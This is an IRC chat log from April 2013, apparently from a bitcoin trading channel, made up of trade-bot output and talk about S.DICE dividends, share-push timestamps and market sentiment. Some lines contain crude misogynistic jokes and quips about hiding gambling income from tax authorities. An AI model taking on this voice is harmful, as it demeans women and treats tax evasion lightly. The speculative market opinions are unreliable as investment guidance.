more easy for you outside US to deal with large sum of gambling income Apr 05 21:20:58 [HAVELOCK] [SDICE] 3 @ 0.3 = 0.9 BTC [-] Apr 05 21:21:57 [HAVELOCK] [SDICE] 4 @ 0.3 = 1.2 BTC [-] Apr 05 21:21:59 [HAVELOCK] [SDICE] 30 @ 0.3 = 9 BTC [-] Apr 05 21:22:00 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [-] Apr 05 21:22:05 what income, just mario coins Apr 05 21:22:09 3/5 years, a long long way !! Apr 05 21:22:19 haha, 100% true Apr 05 21:22:46 for my "IRS" it's like WoW gold Apr 05 21:26:21 hi Apr 05 21:26:49 hi Apr 05 21:27:36 that's private, but my IP shows panama ;) Apr 05 21:28:39 $1.40 is unaffordable! Apr 05 21:29:59 I agree Apr 05 21:30:01 I'll change it soon Apr 05 21:31:31 [BTCTC] [S.DICE-PT] 20 @ 0.00439 = 0.0878 BTC [+] Apr 05 21:34:59 ;;ticker Apr 05 21:35:00 BTCUSD ticker | Best bid: 142.91000, Best ask: 143.50000, Bid-ask spread: 0.59000, Last trade: 142.90000, 24 hour volume: 66234.91364395, 24 hour low: 130.24303, 24 hour high: 144.94000, 24 hour vwap: 137.17646 Apr 05 21:35:59 [MPEX] [S.MPOE] 5700 @ 0.00069796 = 3.9784 BTC [+] Apr 05 21:36:00 [MPEX] [S.MPOE] 13750 @ 0.00070136 = 9.6437 BTC [+] Apr 05 21:36:02 [MPEX] [S.MPOE] 350 @ 0.00070503 = 0.2468 BTC [+] Apr 05 21:41:03 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Apr 05 21:42:35 [BTCTC] [ASICMINER-PT] 1 @ 0.779 BTC [+] Apr 05 21:48:34 [MPEX] [S.MPOE] 20950 @ 0.00070503 = 14.7704 BTC [+] Apr 05 21:49:24 ;;bids 0 Apr 05 21:49:24 There are currently 31146741 bitcoins demanded at or over 0.0 USD, worth 11500405.32 USD in total. | Data vintage: 98.0569 seconds Apr 05 21:49:46 ;;market --buy 2500 Apr 05 21:49:49 A market order to buy 2500 bitcoins right now would take 361889.8503 USD and would take the last price up to 145.9200 USD, resulting in an average price of 144.7559 USD/BTC. | Data vintage: 0.0002 seconds Apr 05 21:49:56 ;;market --buy 3500 Apr 05 21:49:56 A market order to buy 3500 bitcoins right now would take 508025.3582 USD and would take the last price up to 146.9727 USD, resulting in an average price of 145.1501 USD/BTC. | Data vintage: 7.8158 seconds Apr 05 21:50:17 i dont think we'll see 150 today Apr 05 21:51:27 ;;goxlag Apr 05 21:51:28 MtGox lag is 18.559306 seconds. During this time, light travels 0.0371926414237 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 05 21:55:22 <[\\\]> evoorhees, are there plans to release/sell more shares? Apr 05 21:55:54 no Apr 05 21:56:01 ack sorry, let me identify Apr 05 21:56:35 here now Apr 05 21:56:40 no, no plans to release more shares Apr 05 21:56:49 <[\\\]> so it should be pretty stable as to the float at this time Apr 05 22:00:35 well that's up to the marketplace :) Apr 05 22:07:26 [MPEX] [S.MPOE] 6500 @ 0.00070706 = 4.5959 BTC [+] Apr 05 22:09:20 lol my net worth is nowhere near that Apr 05 22:09:29 give it another year maybe Apr 05 22:12:06 evoorhees: hey there! Apr 05 22:12:28 hi Apr 05 22:16:05 [BTCTC] [ASICMINER-PT] 1 @ 0.779 BTC [+] Apr 05 22:24:30 coinbr users got paid from s.dice, too Apr 05 22:26:19 [BTCTC] [GSDPT] 1000 @ 0.00349 = 3.49 BTC [-] Apr 05 22:27:21 [BTCTC] [GSDPT] 1000 @ 0.00349 = 3.49 BTC [-] Apr 05 22:27:53 friday selloff coming? Apr 05 22:28:48 [BTCTC] [GSDPT] 420 @ 0.00349 = 1.4658 BTC [-] Apr 05 22:29:59 ;;goxlag Apr 05 22:30:00 MtGox lag is 29.336976 seconds. During this time, light travels 0.0587909714308 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one week (0.0689 AU). Apr 05 22:31:43 s.dice still turned a profit after that month Apr 05 22:33:08 looks like AM added some hashing Apr 05 22:33:19 up to 7Th on guld now Apr 05 22:33:24 guild*\ Apr 05 22:33:47 [BTCTC] [GSDPT] 30 @ 0.00349 = 0.1047 BTC [-] Apr 05 22:34:38 ;;bc,stats Apr 05 22:34:41 Current Blocks: 229837 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 2002 blocks | Next Difficulty In About: 1 week, 6 days, 14 hours, 51 minutes, and 25 seconds | Next Difficulty Estimate: 9604168.81893 | Estimated Percent Change: 25.16837 Apr 05 22:34:52 ;;nethash Apr 05 22:34:53 54210.8599443 Apr 05 22:40:52 there they go 7,019.47 GH/s Apr 05 22:41:20 climbing rapidly Apr 05 22:43:51 http://www.cnbc.com/id/100619555 Apr 05 22:44:01 [BTCTC] [ASICMINER-PT] 15 @ 0.779 = 11.685 BTC [+] Apr 05 22:44:04 offshore bank accounts are so passe... Apr 05 22:44:22 time to move to bitcoins... Apr 05 22:45:30 This should be good for bitcoin... http://thehill.com/blogs/on-the-money/domestic-taxes/292071-obama-budget-to-target-wealthy-iras Apr 05 22:47:03 [MPEX] [S.DICE] 3394 @ 0.00313722 = 10.6477 BTC [-] Apr 05 22:47:05 [MPEX] [S.DICE] 150 @ 0.00313722 = 0.4706 BTC [-] Apr 05 22:55:16 wheeee Apr 05 23:00:57 ah so sdice paid ? Apr 05 23:02:18 yep Apr 05 23:02:54 [BTCTC] [B.YABMC] 1 @ 0.01301 BTC [+] Apr 05 23:02:55 150 is going down. I know it << lol Apr 05 23:03:11 ;;ticker Apr 05 23:03:12 BTCUSD ticker | Best bid: 142.82500, Best ask: 143.86603, Bid-ask spread: 1.04103, Last trade: 143.86603, 24 hour volume: 69165.45857475, 24 hour low: 130.24303, 24 hour high: 144.94000, 24 hour vwap: 137.79288 Apr 05 23:03:18 ;;goxlag Apr 05 23:03:19 MtGox lag is 70.001993 seconds. During this time, light travels 0.140283210191 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 05 23:03:30 ;;assbotiloveyou Apr 05 23:03:30 Error: "assbotiloveyou" is not a valid command. Apr 05 23:04:31 just in time for what?<<< poor guy. just because they're not after him doesn't mean he's not paranoid. Apr 05 23:05:41 i'd leave the US for the hell of it if my wife was down with it Apr 05 23:05:51 ThickAsThieves you don't have chains in the house ? Apr 05 23:05:59 no sir Apr 05 23:06:13 i'm not that type Apr 05 23:06:38 more of a live and let live kinda guy Apr 05 23:06:51 hey, me too! Apr 05 23:07:25 (not rly) Apr 05 23:07:37 [BTCTC] [ASICMINER-PT] 1 @ 0.7799 BTC [+] Apr 05 23:08:21 so...in a deflationary currency, 0% interest is pretty good Apr 05 23:08:35 mjr epsilon^ Apr 05 23:08:41 epsilon% i mean Apr 05 23:08:53 i also havent pinpointed a specific place and argument for moving there either Apr 05 23:09:18 well, getting back the same exact amount you invested is a net win Apr 05 23:09:21 in purchasing power Apr 05 23:09:27 "honey.... let's move to cancun, a lot of cheap sluts over there and they have bigger tits than you do" Apr 05 23:09:32 in S.DICE's case, you have a positive number Apr 05 23:09:33 i have at least convinced here we need to get the hell out of Florida Apr 05 23:09:49 mircea_popescu: could you add the push date/time to the push receipt ? Apr 05 23:09:49 MJR_ this is true in principle. bitcoin inflation is still marked however. Apr 05 23:10:01 i have no way of knowing if this push request to havelock was before or after the sdice dividend Apr 05 23:10:14 sneaky! Apr 05 23:10:18 topace|2 well the idea is to allow the push-er this freedom Apr 05 23:10:29 you can count it from the time he shows it to you Apr 05 23:10:48 surely you can log your own push incoming requests no? Apr 05 23:10:55 topace|2: the gpg signature contains time, no? Apr 05 23:10:55 ThickAsThieves: nope Apr 05 23:11:05 topace|2 you see a problem with that approach ? Apr 05 23:11:25 bitcoin is inflationary? on a net basis...i would say it is deflationary now (the goods available are increasing faster than the currency) Apr 05 23:11:27 yes, i have no idea if the dividend i received includes the dividend for the units that were pushed or not Apr 05 23:11:37 just a thought Apr 05 23:11:49 well that you can resolve by math, no ? divide net by units ? Apr 05 23:12:13 MJR_ on a monetarist basis. further currency introduced at a fixed rate, about 10% annualised. Apr 05 23:12:24 sure for this one instance, i only have one pending push Apr 05 23:12:32 but what if i had like, 10 push requests pending Apr 05 23:12:39 how do i know which should receive the dividend, and which shouldnt Apr 05 23:12:48 i see what you mean. Apr 05 23:12:57 aka, which i should approve the push for BEFORE the dividend is paid, and which i should wait to approve the push until after Apr 05 23:13:21 the thing here is that this sorta conflicts on a philosophical level, as in, i'd rather have tx's dated by parties than by central system. Apr 05 23:13:32 i'll have an argument over this topic again tho. Apr 05 23:13:40 topace|2: use extra account for pushes Apr 05 23:13:49 i'm fortunate to have one Apr 05 23:14:07 does that mean coinbr to havelock pushes are coming soon? Apr 05 23:14:46 ThickAsThieves: its on our very long todo list Apr 05 23:14:51 not necessarily :) Apr 05 23:14:53 but as a prototype : "21:08 [MPEX] [S.DICE] [PAID] 445.0881225 BTC to". all pushes you received prior to 21:08 you count as before Apr 05 23:15:00 all pushes you received after you count as after. Apr 05 23:15:07 is this a problem ? Apr 05 23:15:27 yes you "just" have to call stat every few seconds Apr 05 23:15:35 not a problem for me, but if someone makes the push before, but doesnt post it to havelock until after, then they completely miss out on the dividend Apr 05 23:15:43 topace|2 that'd be their problem. Apr 05 23:15:54 btc and btc-derivatives are cif not fob. Apr 05 23:16:21 i think that outlook is crucial to allow us further development cheaper Apr 05 23:16:53 cheaper for mpex, yea Apr 05 23:17:25 cheaper for the developer. Apr 05 23:17:35 we do not have the resources to sustain a consumerist attitude on the users. Apr 05 23:17:42 let their government pay us to do that. Apr 05 23:17:46 just as soon as they figure out how. Apr 05 23:18:29 i just shrugged over it, write all balance changes to db and then resolve shit manually Apr 05 23:18:33 mircea_popescu: you slept with my banker Apr 05 23:18:43 thestringpuller i do a lot of sleeping with bankers Apr 05 23:19:01 lol jkjk Apr 05 23:19:02 but seriously, consider the converse approach : user is actually incentivised to time-attack the entire system Apr 05 23:19:14 mircea_popescu: pm Apr 05 23:19:16 it will become possible if difficult to try and time it so he appears to deserve it both ways Apr 05 23:19:37 well ill just go with this for now, kinda in a rush to get out of here Apr 05 23:19:40 !ticker m S.Dice Apr 05 23:19:40 [MPEX:S.DICE] 1D: 0.00313722 / 0.00326249 / 0.00333333 (17108 shares, 55.81 BTC), 7D: 0.0031 / 0.00324529 / 0.00439992 (539474 shares, 1,750.75 BTC), 30D: 0.0031 / 0.00372533 / 0.006 (1704526 shares, 6,349.93 BTC) Apr 05 23:19:41 so ill just get this paid and worry about it later Apr 05 23:19:47 ;;calc 445.0881225 / 50 Apr 05 23:19:48 8.90176245 Apr 05 23:20:12 !ticker m ^oix Apr 05 23:20:13 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 93.3570601 / 108.2470225 / 135.80742037 (19613 shares, 8,037.73 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 05 23:20:37 no new options have been bought? Apr 05 23:20:44 is it like all calls? Apr 05 23:21:02 user is actually incentivised to time-attack the entire system << i don't get it? Apr 05 23:21:07 8`037.73 (35.1 / 64.9) i see Apr 05 23:21:30 jurov if you go by the mpex issued timer, it would be (at least in theory) possible for the user to at least attempt Apr 05 23:21:45 to make a push request so that the time on it shows he got in early to deserve dividends on PT Apr 05 23:21:53 but also have already the dividends on MPEx Apr 05 23:22:04 we'd have to keep clock sync for isntance. Apr 05 23:22:26 O.o so i can't rely on the time?????? Apr 05 23:22:32 you can rely on time for mpex. Apr 05 23:22:36 in the Dividend statjson part Apr 05 23:22:40 can you rely on time for mpex matching havelock's server time ?! Apr 05 23:22:51 no two computers are on the same clock Apr 05 23:23:21 no i understood topace asking for a possibility to compare mpex-issued timestamps Apr 05 23:23:35 o Apr 05 23:23:37 one from STAT, the other one from push receipt Apr 05 23:23:52 but his stat would necessarily be a little off the actual divtime Apr 05 23:24:03 that interval would then be attackable. Apr 05 23:24:33 not STAT timestamp. the dividends timestamp written in stat Apr 05 23:24:51 mircea_popescu: is that the call to put ratio? Apr 05 23:24:58 thestringpuller ye Apr 05 23:25:10 whoa 64.9% puts?!?!?!? Apr 05 23:25:40 jurov that may be workable Apr 05 23:25:54 i am scared for the next 3/4th of the month Apr 05 23:25:55 which is why i say, i'll have this argued again Apr 05 23:25:57 [HAVELOCK] [SDICE] 9 @ 0.31 = 2.79 BTC [+] Apr 05 23:26:08 !ticker h him Apr 05 23:26:11 [HAVELOCK:HIM] 1D: 1.91900000 / 1.92266667 / 1.93000000 (6 shares, 11.53600000 BTC), 7D: 1.87000000 / 1.98205865 / 2.08000000 (104 shares, 206.13409996 BTC), 30D: 1.41000000 / 1.81361388 / 2.08000000 (720 shares, 1305.80199240 BTC) Apr 05 23:26:17 jurov you'd also prefer timestamp on push receipts ? Apr 05 23:26:27 no need to argue, if the push timestamp can be extracted from gpg signaature Apr 05 23:26:48 i think it is supported, hence no problem Apr 05 23:27:02 i don't recall that being a documented feature ;/ Apr 05 23:27:18 you can get timestamps from gpg i think Apr 05 23:27:23 tells you time signes Apr 05 23:27:25 tells you time signed Apr 05 23:27:40 there's a difference between "you can get" and "developer assures you it's workable" Apr 05 23:27:47 gpg: Signature made Pi 5. apríl 2013, 21:17:58 CEST using DSA key ID CFE0F3E1 Apr 05 23:28:06 ^^^ just threw my recent DEPOSIT response into gpg Apr 05 23:28:15 yeh Apr 05 23:28:16 so the time is there Apr 05 23:28:43 compare a stat's announced time with it's sigtime Apr 05 23:29:00 mircea_popescu what is attackable though? i would think risk is on the pt ooerator not mpex Apr 05 23:29:08 [BTCTC] [ASICMINER-PT] 1 @ 0.78 BTC [+] Apr 05 23:29:11 thestringpuller even so. Apr 05 23:29:19 the argument was "allows us to develop cheaper". Apr 05 23:29:31 guy down the road being massacred is no consolation to me. Apr 05 23:29:39 develop cheaper what? Apr 05 23:29:44 everything. Apr 05 23:29:48 stuff like the pushing around. Apr 05 23:30:12 but how so? to steal what? Apr 05 23:30:22 get doubledivs. Apr 05 23:30:29 ity's really the doublespend attack Apr 05 23:30:37 from mpex?!? Apr 05 23:30:49 look. Apr 05 23:30:58 [HAVELOCK] [SDICE] 10 @ 0.3008 = 3.008 BTC [-] Apr 05 23:30:59 [HAVELOCK] [SDICE] 90 @ 0.3 = 27 BTC [-] Apr 05 23:31:01 explain like i am 4 Apr 05 23:31:07 whenever there's three entities moving payments on the internet there's this classical well documented problem of the doublespend. Apr 05 23:31:13 that you'll have to read up on. Apr 05 23:31:36 i see Apr 05 23:31:49 bitcoin solves it by the blockchain solution Apr 05 23:32:05 mpex solves it by the "fu, all times are construed to our best advantage" solution Apr 05 23:32:10 this is way cheaper than 50TH/s Apr 05 23:32:33 also way faster than 10 minute blocks. Apr 05 23:33:24 the sigtime is same (down to seconds) as the one in stat Apr 05 23:33:38 jurov i'm impressed. Apr 05 23:33:46 $mpexlag Apr 05 23:33:48 mircea_popescu: 0.105636119843 seconds Apr 05 23:33:54 meh, then again it would be. Apr 05 23:33:57 oo breakout soon Apr 05 23:34:02 ;;ticker Apr 05 23:34:03 BTCUSD ticker | Best bid: 143.90000, Best ask: 144.00000, Bid-ask spread: 0.10000, Last trade: 144.00000, 24 hour volume: 70257.63553139, 24 hour low: 130.24303, 24 hour high: 144.94000, 24 hour vwap: 138.22468 Apr 05 23:34:27 even if it would be a second or two apart, that is well inside requirement for this application Apr 05 23:35:23 i'd be worried if it's anything other than a second anyway Apr 05 23:36:43 "Hey @jimcramer can we set up a time to chat about Bitcoin? If your not convinced, I'll give you 5 BTC for free #Bitcoin #BitInstant" Apr 05 23:36:45 shremspells. Apr 05 23:38:25 "@maxkeiser 1h Despite state-orchestrated massive DDoS attacks on BTC exchanges this week; BTC inching up toward record high territory." jesus twitter is just like reddit Apr 05 23:38:39 aka ganjix getting invited to CNBC Apr 05 23:43:38 stop arguing with proles, dude Apr 05 23:43:43 the proles* Apr 05 23:44:09 for a nominally epic top you sure do enjoy exposing yourself to mental anguish Apr 05 23:44:15 ;) Apr 05 23:44:25 benkay max keiser is in particular a funny one. day before yest he was like, o, i predict, 300 dollars per btc. Apr 05 23:44:33 i told him to stfu, he deleted that tweet, now he's Apr 05 23:44:59 @maxkeiser 1h Apr 05 23:44:59 My trade idea earlier in week of parking a few $150 priced BTC in Silver is paying off nicely. Apr 05 23:45:16 usagi got a twitter Apr 05 23:46:35 is he leveraging the synergy ? Apr 05 23:46:59 what does that mean, to park $150 priced BTC in silver? Apr 05 23:47:15 convert btc to silver holdings? Apr 05 23:47:19 bought usagis asset? Apr 05 23:48:04 benkay that retrospectively, he sold some btc. Apr 05 23:48:24 lol maxkeiser and shrem, i saw those on twitter Apr 05 23:48:35 i am shooting for squawkbox Apr 05 23:48:40 rather than cramer Apr 05 23:48:54 better traders in the early morning Apr 05 23:49:06 but rly, i'm looking forward to some high-profile blogger getting caught in nether parts of bitcoin "security" market Apr 05 23:49:09 cramer is for housewives etc Apr 05 23:49:21 can't really say as I understand the value in paying much attention to the newly minted chattering classes on twitter, especially w/r/t high finance Apr 05 23:49:34 don't know how much i care about people who buy and sell individual coins Apr 05 23:49:51 my philosophy is this Apr 05 23:49:54 benkay but it's funny. Apr 05 23:50:04 one million people buying one coin = one million coins on the buy side Apr 05 23:50:23 o look, it broke through or what was it ? Apr 05 23:50:38 we have to enjoy this volatility while it lasts, it won't be here much longer i think Apr 05 23:50:43 MJR_ one woman's arm = 2lbs of sweet caress. Apr 05 23:50:51 when i want funny, i go to the dog park and watch my dog hump other dogs Apr 05 23:50:53 2mn fireants = 2lbs of pure pain Apr 05 23:51:09 mircea_popescu: good point Apr 05 23:51:14 it's doubly amusing because he's a pitbull and people get anxious Apr 05 23:51:16 not sure how it relates though... Apr 05 23:51:20 nothing's more dangerous for a new issuance than a large number of clueless investors. Apr 05 23:51:47 well...i think if those people actually are worried about losing the ~150 then they aren't who i'm talking about Apr 05 23:51:48 it's like putting a seedling through a sandblaster. Apr 05 23:51:56 MJR_ OF COURSE THEY ARE Apr 05 23:51:59 it;'s all they have Apr 05 23:52:13 i'm saying, "if you saw it on the news, if you are interested, just buy one and hold it a year at least" Apr 05 23:52:19 watch the ride, learn about it Apr 05 23:52:28 don't trade it, for the love of god Apr 05 23:52:30 just hold it Apr 05 23:52:32 yea, because a. they listen and b. they even comprehend wtf the words you just say mean Apr 05 23:52:33 i give away $150 to my friends Apr 05 23:52:37 here, free money Apr 05 23:52:41 they say thanks Apr 05 23:52:51 jcpham i only do that with women. Apr 05 23:52:59 you don't give things away, mp Apr 05 23:53:00 don't lie Apr 05 23:53:01 all i'm saying is that most of my friends could give two shits about 150 Apr 05 23:53:09 but they do enjoy being "part of the story" Apr 05 23:53:12 all of the women i know are my wife's friends so i can't fuck them Apr 05 23:53:16 i know oyour qpq Apr 05 23:53:17 so they get nothing! Apr 05 23:53:22 or being able to say "i was in that back when they were $150" Apr 05 23:53:25 you can't sleep with your friends wives? Apr 05 23:53:29 benkay o yea ? https://twitter.com/Mircea_Popescu/status/320175664927997953 Apr 05 23:53:36 what nao benkay ? what nao ? hm ? HUM ? Apr 05 23:53:37 working on it benkay Apr 05 23:53:45 may have to trade in for a newer model Apr 05 23:53:56 [HAVELOCK] [SDICE] 5 @ 0.2893 = 1.4465 BTC [-] Apr 05 23:53:56 mircea_popescu i see an exchange there Apr 05 23:54:06 mircea_popescu no gift Apr 05 23:54:07 no, it's me giving shit away Apr 05 23:54:38 pretty sure your buying nudity Apr 05 23:54:40 you're Apr 05 23:54:49 im not buying it. Apr 05 23:54:52 i'm sponsoring it. Apr 05 23:54:57 hurr durr Apr 05 23:54:58 she's not bad lookin' either. Apr 05 23:55:16 you and i both know this is a dumb conversation, you gave me something of relatively significant value recently Apr 05 23:55:33 yeah lol, but why not continue something dumb into the ground :D Apr 05 23:55:43 since when have we not :) Apr 05 23:56:04 that IS how this became the best channel on free node Apr 05 23:56:11 i was mostly trying to figure out if your mom told you. seems not. whew. Apr 05 23:56:30 for an aristocrat you really scrape the barrel Apr 05 23:56:44 i'm one of those perverse aristrocrats. Apr 05 23:56:55 like the stupid guy in point-counterpoint Apr 05 23:57:21 do you read Unqualified Reservations? Apr 05 23:57:41 ocasionally Apr 05 23:57:49 kinda served the guy, he never answered Apr 05 23:57:58 ooh, care to link? Apr 05 23:58:52 for some reason, my friend loves max keiser Apr 05 23:58:57 [HAVELOCK] [VTX] 2 @ 0.4448 = 0.8896 BTC [-] Apr 05 23:59:04 i think he may be trolling me Apr 05 23:59:15 http://trilema.com/2013/stage-n-bitcoin-exists/ Apr 05 23:59:36 MJR_ nothing wrong with him as far as tv personalities go. Apr 06 00:00:56 [HAVELOCK] [SDICE] 1 @ 0.28800001 BTC [-] Apr 06 00:00:58 [HAVELOCK] [SDICE] 8 @ 0.288 = 2.304 BTC [-] Apr 06 00:00:59 [HAVELOCK] [SDICE] 10 @ 0.285 = 2.85 BTC [-] Apr 06 00:01:00 [HAVELOCK] [SDICE] 1 @ 0.284 BTC [-] Apr 06 00:01:01 [HAVELOCK] [SDICE] 10 @ 0.28 = 2.8 BTC [-] Apr 06 00:01:02 [HAVELOCK] [SDICE] 8 @ 0.278 = 2.224 BTC [-] Apr 06 00:01:04 [HAVELOCK] [SDICE] 2 @ 0.278 = 0.556 BTC [-] Apr 06 00:01:05 [HAVELOCK] [SDICE] 2 @ 0.276666 = 0.5533 BTC [-] Apr 06 00:01:06 [HAVELOCK] [SDICE] 34 @ 0.275 = 9.35 BTC [-] Apr 06 00:01:07 [HAVELOCK] [SDICE] 24 @ 0.275 = 6.6 BTC [-] Apr 06 00:01:07 its his tv personality that bothers me...he appears to be on meth...kinda disheveled Apr 06 00:01:18 [MPEX] [S.MPOE] 1300 @ 0.00070705 = 0.9192 BTC [-] Apr 06 00:01:19 fuck Apr 06 00:01:19 [MPEX] [S.MPOE] 7585 @ 0.00070706 = 5.3631 BTC [+] Apr 06 00:01:24 [MPEX] [S.MPOE] 6215 @ 0.00070719 = 4.3952 BTC [+] Apr 06 00:02:14 .275 srtsly ?!@ Apr 06 00:05:33 i know Apr 06 00:06:56 this is kinda great on one level Apr 06 00:07:03 hmmm... Apr 06 00:07:41 ;;calc 890/276100 Apr 06 00:07:41 0.00322346975733 Apr 06 00:08:02 ;;calc 0.00322346975733*12 Apr 06 00:08:03 0.038681637088 Apr 06 00:08:23 almost 4 percent using one of the worst months as the test case Apr 06 00:08:30 and in bitcoin Apr 06 00:08:36 and in reference to monetarist...exactly Apr 06 00:08:39 people have no cvlue. they'll learn. Apr 06 00:08:57 yes, but hopefully i can scoop up a big chunk of the float before they do Apr 06 00:09:00 the ability to make bad deals is what teaches people to stick to good ones. Apr 06 00:09:05 good point Apr 06 00:09:18 i am only annoyed from a "show the best performance" perspective Apr 06 00:09:24 yes well... here's the thing : Apr 06 00:09:29 i am very happy from a "get the best investment" perspective Apr 06 00:09:34 a lot of newbs playing around introduce distortion in the marketplace. Apr 06 00:09:40 let's consider the life of Noob. Apr 06 00:09:49 actually fuck this, ima wriote an article, brb. Apr 06 00:09:53 [MPEX] [S.DICE] 1000 @ 0.0033333 = 3.3333 BTC [+] Apr 06 00:09:57 i mean, this IS on 13% of the shares...and only on the small percentage of which are traded Apr 06 00:10:00 lulz Apr 06 00:11:56 [HAVELOCK] [SDICE] 1 @ 0.276 BTC [+] Apr 06 00:11:57 [HAVELOCK] [SDICE] 28 @ 0.275 = 7.7 BTC [-] Apr 06 00:14:57 [HAVELOCK] [SDICE] 1 @ 0.309 BTC [+] Apr 06 00:16:56 [HAVELOCK] [SDICE] 1 @ 0.27070001 BTC [-] Apr 06 00:18:56 [HAVELOCK] [SDICE] 1 @ 0.2707 BTC [-] Apr 06 00:20:04 [BTCTC] [ASICMINER-PT] 1 @ 0.78 BTC [+] Apr 06 00:26:54 christ... SDICE... Apr 06 00:26:57 [HAVELOCK] [VTX] 1 @ 0.425 BTC [-] Apr 06 00:30:44 ;;ticker Apr 06 00:30:45 BTCUSD ticker | Best bid: 142.62742, Best ask: 143.00000, Bid-ask spread: 0.37258, Last trade: 142.62742, 24 hour volume: 69848.45947306, 24 hour low: 130.24303, 24 hour high: 144.94000, 24 hour vwap: 138.48970 Apr 06 00:31:56 [HAVELOCK] [SDICE] 1 @ 0.2999 BTC [+] Apr 06 00:32:15 MJR_ http://trilema.com/2013/the-broad-and-the-million-fireants-a-parable/ Apr 06 00:32:15 there. Apr 06 00:34:34 mp: good article Apr 06 00:36:01 rise in btcusd is nice 'n all, but the mad rush in by noobs does have its downsides... Apr 06 00:36:50 yeh. trust, but verify, grow but fortify. Apr 06 00:37:00 [BTCTC] [GSDPT] 210 @ 0.0032 = 0.672 BTC [-] Apr 06 00:37:17 topace|2: trying to register on havelock, no mail comes, nothing in spam folder either Apr 06 00:37:40 go away jurov Apr 06 00:37:49 "He does not understand these words, as is the case with all the words he uses." < best line Apr 06 00:38:10 yeah, it's always funny when people resort to definitions in an argument with the avg redditor. Apr 06 00:38:16 im like... yeah, right. he uses that system. Apr 06 00:38:27 that's how he got confused in the first place. Apr 06 00:38:58 [HAVELOCK] [SDICE] 1 @ 0.305 BTC [+] Apr 06 00:39:03 lol Apr 06 00:39:50 friend calls you on the phone, "hey, i'm stranded at the airport" "well... get in your car and here's driving directions" Apr 06 00:39:51 totally. Apr 06 00:40:01 that's why he's calling you. cause he has a car at the airport. Apr 06 00:40:40 lmao Apr 06 00:41:30 [BTCTC] [GSDPT] 37 @ 0.00349 = 0.1291 BTC [+] Apr 06 00:42:31 seriously, though, only bad things happen to noobs and bad things can happen easily in bitcoins if you don't know what you're doing... Apr 06 00:42:39 combustible combination... Apr 06 00:43:15 verily. Apr 06 00:43:31 i think we'll have to slowly change the sales pitch on bitcoin from Apr 06 00:43:36 i just hope that bitcoin public image doesn't get too bruised getting through this growth spurt Apr 06 00:43:38 "everyone's invited" to "this is dangerous" Apr 06 00:44:00 then more will want in! Apr 06 00:44:04 hm Apr 06 00:44:45 well at least they'd have had been warned. Apr 06 00:44:46 fuck Apr 06 00:44:54 how does engluish make the past subjonctive again ? Apr 06 00:44:57 [HAVELOCK] [SDICE] 1 @ 0.29999999 BTC [-] Apr 06 00:45:18 [BTCTC] [S.MPOE-PT] 2 @ 0.000656 = 0.0013 BTC [+] Apr 06 00:45:50 [at the time in the past we're discussing, this other event had already definitely happened in the past], how do you say that Apr 06 00:46:12 mjr and I are FLOODED with requests from our collegues, friends, and drinking buddies to buy bitcoins FOR them... Apr 06 00:46:27 brokerage ftw Apr 06 00:46:28 I suppose that's safer then them doing it themselves - lol Apr 06 00:46:58 [MPEX] [S.MPOE] 3235 @ 0.00070719 = 2.2878 BTC [+] Apr 06 00:47:03 [MPEX] [S.MPOE] 13465 @ 0.00070873 = 9.543 BTC [+] Apr 06 00:47:10 would that we would have? Apr 06 00:47:15 past subjunctive Apr 06 00:47:55 mircea_popescu: i advocate that perspective daily Apr 06 00:48:01 bitcoins are a sophisticated financial instrument Apr 06 00:48:07 mircea_popescu: your article is intriguing Apr 06 00:48:09 pgp turns out would is auxiliary there, not personal, so it was correct Apr 06 00:48:14 they'd have been warned. Apr 06 00:48:30 does this add to the situation wednesday? Apr 06 00:48:45 ye Apr 06 00:48:47 i say: "you know how your beloved government doesn't let you invest in profitable things? bitcoins are exactly the kind of thing you're not supposed to invest in." Apr 06 00:48:47 yes Apr 06 00:48:58 thestringpuller how do you mean ? Apr 06 00:49:01 ;;ticker Apr 06 00:49:02 BTCUSD ticker | Best bid: 142.80001, Best ask: 143.49999, Bid-ask spread: 0.69998, Last trade: 143.77119, 24 hour volume: 69859.70987158, 24 hour low: 130.24303, 24 hour high: 144.94000, 24 hour vwap: 138.54781 Apr 06 00:49:06 [BTCTC] [GSDPT] 1790 @ 0.0032 = 5.728 BTC [-] Apr 06 00:49:50 i dunno why people hate on gmo food. these grapes are the size of prunes, taste like grape juice and have no seeds at all. Apr 06 00:50:04 looking forward to the woman made out of eyes, tits and ankles only. Apr 06 00:50:36 rawr change is bad Apr 06 00:50:45 science is scawwy Apr 06 00:51:17 mircea_popescu: you said in your article "The situation in the market was becoming macroeconomically concerning, in the following sense : major holders were done selling, the vast majority of trading action consisting of trades among newcomers brought in by the recent significant press exposure" it seems noobs were about to cause a bubble and if left "unkempt" the herd mentality could cause catostrophic issues to Apr 06 00:51:30 a yeah. i believe so. Apr 06 00:51:41 all the "it's going to 500" talk was putting us on the spot Apr 06 00:51:57 correction without collapse => show of strength. no bubble can do that Apr 06 00:52:06 no trend-only item survives the past 3 days. Apr 06 00:52:15 the problem with gmo's is half the work they do is to make 'em pesticide/herbacide resistant. Apr 06 00:52:20 sometimes you have to go down to go up... Apr 06 00:52:26 they do that so they can slather them with pesticides and herbicides Apr 06 00:52:29 [MPEX] [S.MPOE] 1300 @ 0.00070508 = 0.9166 BTC [-] Apr 06 00:52:30 yum Apr 06 00:52:30 [MPEX] [S.MPOE] 3450 @ 0.00070507 = 2.4325 BTC [-] Apr 06 00:52:35 burnside i wasn't being ingenuous you know Apr 06 00:52:49 heh Apr 06 00:52:58 sometimes I process things a lil slow Apr 06 00:53:10 like my withdrawals? Apr 06 00:53:12 ;) Apr 06 00:53:13 my cpu is a 286 Apr 06 00:53:16 lol zing Apr 06 00:53:30 at least he processes them dood. Apr 06 00:53:32 you always plug 'em in in the middle of the night! Apr 06 00:53:58 i'm sorting out Apr 06 00:54:02 mircea_popescu: yes which is why as youve stated the presence of big players (as yourself) keeps the economy from having a complete collapse. i pose a scenario where the noobs become educated. what occurs when the economy is composed of more competency? Apr 06 00:54:04 just gotta keep my btc more spread around Apr 06 00:54:19 the more competence the more we onw. Apr 06 00:54:23 own* Apr 06 00:54:31 